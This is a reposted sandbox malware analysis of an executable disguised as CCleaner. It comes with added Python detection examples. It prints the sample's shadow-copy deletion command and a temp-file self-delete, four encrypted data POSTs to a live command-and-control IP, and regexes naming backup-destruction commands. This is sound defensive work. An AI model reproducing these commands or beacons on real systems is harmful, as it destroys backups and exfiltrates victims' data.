zcuSHbuD2Wn3.exe

Source: Internet | Editor: 程序博客网 | Time: 2024/06/05 03:01

Reposted from: https://www.hybrid-analysis.com/sample/f41d0e00ffe1f8932eda937bb8d32a83c8992c1f596bd3a741c08190925c9e64?environmentId=1

Analyzed on April 28th 2016 06:45:03 (CEST) on Windows 7 32 bit
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
VxStream Sandbox v4.10 © Payload Security

Attention: this analysis ran with the legacy Usermode Monitor. It is highly recommended to use the Kernelmode Monitor.

Incident Response

Risk Assessment

Remote Access
Contains ability to listen for incoming connections
Spyware/Leak
POSTs files to a webserver
Ransomware
The input sample dropped a known ransomware file
Deletes volume snapshots (often used by Ransomware)
Fingerprint
Reads the cryptographic machine GUID
Contains ability to lookup the windows account name
Network Behavior
Contacts 1 host. View the network section for more details.

Indicators

Not all malicious and suspicious indicators are displayed in this copy of the report.

  • Malicious Indicators 9

  • External Systems
    • Detected Emerging Threats Alert
    • Sample was identified as malicious by at least one Antivirus engine
  • Installation/Persistence
    • Allocates virtual memory in foreign process
    • Writes data to a remote process
  • Spyware/Information Retrieval
    • Accesses potentially sensitive information from local browsers
  • Unusual Characteristics
    • Contains native function calls
  • Hiding 3 Malicious Indicators
  • Suspicious Indicators 25

  • Anti-Detection/Stealthyness
    • Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
    • Sets the process error mode to suppress error box
  • Anti-Reverse Engineering
    • Contains ability to register a top-level exception handler (often used as anti-debugging trick)
    • PE file has unusual entropy sections
  • Environment Awareness
    • Contains ability to query the machine version
    • Reads the cryptographic machine GUID
  • External Systems
    • Detected Emerging Threats Alert
  • General
    • POSTs files to a webserver
  • Installation/Persistence
    • Creates/touches files in windows directory
    • Monitors specific registry key for changes
  • Network Related
    • Found potential IP address in binary/memory
    • Uses a User Agent typical for browsers, although no browser was ever launched
  • System Destruction
    • Opens file with deletion access rights
  • System Security
    • Contains ability to elevate privileges
    • Modifies proxy settings
  • Unusual Characteristics
    • Imports suspicious APIs
    • Reads information about supported languages
  • Hiding 8 Suspicious Indicators
  • Informative 12

  • Environment Awareness
    • Contains ability to query machine time
    • Contains ability to query volume size
  • General
    • Contacts server
    • Contains PDB pathways
    • Creates mutants
    • Loads modules at runtime
    • Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)
    • Runs shell commands
    • Spawns new processes
  • Installation/Persistence
    • Contains ability to lookup the windows account name
    • Dropped files
  • Network Related
    • Found potential URL in binary/memory

File Details

All Details:

zcuSHbuD2Wn3.exe

Filename
zcuSHbuD2Wn3.exe
Size
176KiB (179712 bytes)
Type
PE32 executable (GUI) Intel 80386, for MS Windows
Architecture
32 Bit
SHA256
f41d0e00ffe1f8932eda937bb8d32a83c8992c1f596bd3a741c08190925c9e64

Resources

Language
ENGLISH

Version Info

LegalCopyright
Copyright 2005-2015 Piriform Ltd
InternalName
ecleaner
FileVersion
5, 11, 00, 5408
CompanyName
Piriform Ltd
Comments
CCleaner
ProductName
ECleaner
ProductVersion
5, 11, 00, 5408
FileDescription
ECleaner
OriginalFilename
ecleaner.exe
Translation
0x0409 0x04b0

Classification (TrID)

  • 42.1% (.EXE) Win32 Executable MS Visual C++ (generic)
  • 37.3% (.EXE) Win64 Executable (generic)
  • 8.8% (.DLL) Win32 Dynamic Link Library (generic)
  • 6.0% (.EXE) Win32 Executable (generic)
  • 2.7% (.EXE) Generic Win/DOS Executable

File Sections

Name | Entropy | Virtual Address | Virtual Size | Raw Size | MD5
(section rows were not preserved in this copy of the report)

File Imports

BuildExplicitAccessWithNameW
ChangeServiceConfigW
CloseServiceHandle
ControlService
CreateProcessAsUserW
CreateServiceW
DeleteService
DeregisterEventSource
DuplicateTokenEx
EnumDependentServicesW
GetNamedSecurityInfoW
GetTokenInformation
OpenProcessToken
OpenSCManagerW
OpenServiceW
QueryServiceStatusEx
RegCloseKey
RegCreateKeyExW
RegCreateKeyW
RegEnumKeyW
RegisterEventSourceW
RegisterServiceCtrlHandlerExW
RegOpenKeyExW
RegOpenKeyW
RegQueryValueExW
RegSetValueExW
ReportEventW
RevertToSelf
SetEntriesInAclW
SetNamedSecurityInfoW
SetServiceStatus
SetTokenInformation
StartServiceCtrlDispatcherW
StartServiceW

Hybrid Analysis

Analysed 3 processes in total (System Resource Monitor).

  • zcuSHbuD2Wn3.exe (PID: 3824)
    • vssadmin.exe Delete Shadows /All /Quiet (PID: 1128)
    • cmd.exe /C del /Q /F "%TEMP%\sysE574.tmp" (PID: 2984)
Tags: Reduced Monitoring, Contains Streams, Memory Dumps Available
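The process tree above records two child commands worth alerting on: shadow-copy deletion with vssadmin (the "Deletes volume snapshots" flag in the risk assessment) and cmd.exe deleting a dropped %TEMP% file, i.e. the dropper cleaning up after itself. The Python below is an added example, not part of the Hybrid Analysis report, that runs those two detections over constructed process-creation events modelled on the tree. PIDs and command lines are taken from the report; the image paths, the parent image and the extra benign vssadmin event are assumptions. It goes beyond the report by also matching the wmic and vssadmin-resize spellings of shadow-copy destruction.

```python
"""Detections for the two child processes in the sandbox process tree: shadow-copy
deletion (vssadmin) and cmd.exe deleting a dropped %TEMP% file. Added example, not
part of the report; the events below are constructed to mirror the tree."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (the shape of Sysmon event 1 / EDR telemetry)."""
    pid: int
    parent_image: str
    image: str
    command_line: str


# PIDs and command lines are from the report; image paths, the parent image and the
# final benign event are assumptions.
SAMPLE_EVENTS = [
    ProcEvent(3824, r"C:\Windows\explorer.exe",
              r"C:\Users\user\Desktop\zcuSHbuD2Wn3.exe", "zcuSHbuD2Wn3.exe"),
    ProcEvent(1128, r"C:\Users\user\Desktop\zcuSHbuD2Wn3.exe",
              r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe Delete Shadows /All /Quiet"),
    ProcEvent(2984, r"C:\Users\user\Desktop\zcuSHbuD2Wn3.exe",
              r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /C del /Q /F "C:\Users\user\AppData\Local\Temp\sysE574.tmp"'),
    ProcEvent(4100, r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe list shadows"),
]

# Shadow-copy destruction (MITRE ATT&CK T1490). The report shows the vssadmin form;
# the wmic and resize-to-shrink variants are the other common spellings.
SHADOW_DELETE = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"vssadmin(\.exe)?\s+resize\s+shadowstorage\b.*/maxsize=", re.I),
]

# cmd /C del of a .tmp under %TEMP% (expanded or not): a dropper cleaning up after itself.
TEMP_SELF_DELETE = re.compile(r'cmd(\.exe)?\s+/c\s+del\b.*?(%temp%|\\temp)\\[^"\s]+\.tmp', re.I)

# Parents for which a manual "del" in %TEMP% is ordinary user activity, not self-cleanup.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}


def classify(ev: ProcEvent) -> list[str]:
    """Return the detection tags that fire for one process-creation event."""
    tags = []
    if any(p.search(ev.command_line) for p in SHADOW_DELETE):
        tags.append("shadow_copy_deletion")
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    if TEMP_SELF_DELETE.search(ev.command_line) and parent not in INTERACTIVE_PARENTS:
        tags.append("temp_file_self_cleanup")
    return tags


def scan(events) -> dict[int, list[str]]:
    """Map PID -> tags for every event that matched at least one detection."""
    return {ev.pid: classify(ev) for ev in events if classify(ev)}


if __name__ == "__main__":
    for pid, tags in scan(SAMPLE_EVENTS).items():
        print(pid, tags)
```

The parent-process check is what keeps the self-cleanup rule quiet: the same `del` typed into an interactive cmd.exe is ignored, while a cmd.exe spawned by an unknown executable to delete a .tmp it just dropped is flagged. On the report's tree, only PIDs 1128 and 2984 match.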

Network Analysis

DNS Requests

No relevant DNS requests were made.

Contacted Hosts

Host Address | Host Port | Host Protocol | Host Details
31.41.44.246 | 80 | TCP | Russian Federation, ASN 49505 (OOO Network of data-centers Selectel)

Port Protocol Description
Port 80: Hypertext Transfer Protocol (HTTP)

HTTP Traffic

Endpoint | Method/Response | URL/Code | Data

31.41.44.246:80 | POST | /userinfo.php
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 31.41.44.246
Content-Length: 423
Connection: Keep-Alive
Cache-Control: no-cache
Raw hex: 96FB7447BC33B71634CFBFA0BC46CE2D94AA40AF9A125BF5B99B4C3940DDD8750F8A45D6555554220AA503AD9B08833514BCBA7E42EC5E25B14EF483CF7C3...

31.41.44.246:80 | POST | /userinfo.php
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 31.41.44.246
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
Readable: &b
Raw hex: E226620EA2118C63F2CF235B2EB6AD65312A4499FCCD2FC10052507883AB6A4F4E937DD6AFEECE1DBA126ABB9CFB818C1D7BBFBCD35ED50CA3427F4BA1715...

31.41.44.246:80 | POST | /userinfo.php
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 31.41.44.246
Content-Length: 318
Connection: Keep-Alive
Cache-Control: no-cache
Raw hex: 878C60B9709321AF10554F60EF3C01F67905EBBA9186A884E5C127870551E15482B43405CBF383B2DF08CAA2FAF0052B6591552E040902634AC2673AC3A64...

31.41.44.246:80 | POST | /userinfo.php
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 31.41.44.246
Content-Length: 397
Connection: Keep-Alive
Cache-Control: no-cache
Raw hex: A0ADFDB6513C895D535C72667B75C686D27D9BBCEEE089F0506E283985CFA0814B7428CF7F18BB28EA50D17FBBDF01A17B19E0BC53D23D75E1ED99B66A783...

Emerging Threats

Event | Category | Description | SID
31.41.44.246:80 (TCP) | A Network Trojan was detected | ET TROJAN Generic - POST To .php w/Extended ASCII Characters | 2017259
31.41.44.246:80 (TCP) | Potentially Bad Traffic | ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 | 2018358
31.41.44.246:80 (TCP) | A Network Trojan was detected | ET TROJAN Generic - POST To .php w/Extended ASCII Characters | 2017259
31.41.44.246:80 (TCP) | A Network Trojan was detected | ET TROJAN Win32/Necurs Common POST Header Structure | 2021995
31.41.44.246:80 (TCP) | Potentially Bad Traffic | ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 | 2018358
31.41.44.246:80 (TCP) | A Network Trojan was detected | ET TROJAN Generic - POST To .php w/Extended ASCII Characters | 2017259
31.41.44.246:80 (TCP) | Potentially Bad Traffic | ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 | 2018358
31.41.44.246:80 (TCP) | A Network Trojan was detected | ET TROJAN Generic - POST To .php w/Extended ASCII Characters | 2017259
31.41.44.246:80 (TCP) | Potentially Bad Traffic | ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 | 2018358
ET rules applied using Suricata.
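The four POSTs trip the Emerging Threats signatures for the same reasons an analyst would flag them by eye: a POST to a bare IP address carrying an Internet Explorer User-Agent while no browser was ever launched, and a body declared as application/x-www-form-urlencoded that is plainly not form data. The Python below is an added example, not part of the report and not Hybrid Analysis or Suricata code, that applies those checks to a raw HTTP request. The request headers are copied from the report's first POST; the body is constructed from the first 32 bytes of that request's hex dump with Content-Length adjusted to match (the real request carried 423 bytes and the dump is truncated), and the benign comparison request is invented.

```python
"""Triage checks for the C2 POSTs in the report: browser-looking User-Agent, dotted-quad
Host, and a binary body declared as a urlencoded form. Added example, not report code."""
from ipaddress import ip_address

# Headers copied from the report's first request; body constructed from the first 32 bytes
# of its hex dump (Content-Length adjusted to match; the real request carried 423 bytes).
SAMPLE_REQUEST = (
    b"POST /userinfo.php HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; "
    b".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
    b".NET4.0C; .NET4.0E)\r\n"
    b"Host: 31.41.44.246\r\n"
    b"Content-Length: 32\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    + bytes.fromhex("96FB7447BC33B71634CFBFA0BC46CE2D94AA40AF9A125BF5B99B4C3940DDD875")
)

# Constructed benign request for comparison: a real login form posted to a hostname.
BENIGN_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0\r\n"
    b"Host: intranet.example.com\r\n"
    b"Content-Length: 21\r\n"
    b"\r\n"
    b"user=alice&pw=hunter2"
)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body); header names lower-cased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def binary_ratio(body: bytes) -> float:
    """Fraction of body bytes that cannot occur in a urlencoded form body
    (anything >= 0x80, or a control byte other than tab/LF/CR)."""
    if not body:
        return 0.0
    bad = sum(1 for b in body if b >= 0x80 or (b < 0x20 and b not in (0x09, 0x0A, 0x0D)))
    return bad / len(body)


def triage(raw: bytes, browser_running: bool = False) -> list:
    """Return the reasons a request looks like malware C2 rather than browser traffic.
    browser_running: whether a browser process existed on the host at the time (the sandbox
    reported none; in production this comes from process telemetry, not from the packet)."""
    method, path, headers, body = parse_request(raw)
    reasons = []
    host = headers.get("host", "").rsplit(":", 1)[0]
    try:
        ip_address(host)
        dotted_quad = True
    except ValueError:
        dotted_quad = False
    ua = headers.get("user-agent", "")
    if method == "POST" and dotted_quad and ua.startswith("Mozilla/") and not browser_running:
        reasons.append("post_to_dotted_quad_with_browser_ua")
    ratio = binary_ratio(body)
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded") and ratio > 0.25:
        reasons.append("binary_body_declared_as_form")
    if path.lower().endswith(".php") and ratio > 0.0:
        reasons.append("extended_ascii_post_to_php")
    declared = headers.get("content-length", "")
    if declared.isdigit() and int(declared) != len(body):
        reasons.append("content_length_mismatch")
    return reasons


if __name__ == "__main__":
    print("sample:", triage(SAMPLE_REQUEST))
    print("benign:", triage(BENIGN_REQUEST))
```

The body check is deliberately a ratio rather than "any high byte": real form bodies percent-encode non-ASCII, so a urlencoded body that is a quarter binary is never a browser form, while the .php check mirrors the ET rule's lower bar. The `browser_running` flag is the piece the report's "Uses a User Agent typical for browsers, although no browser was ever launched" indicator adds over a pure network signature.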
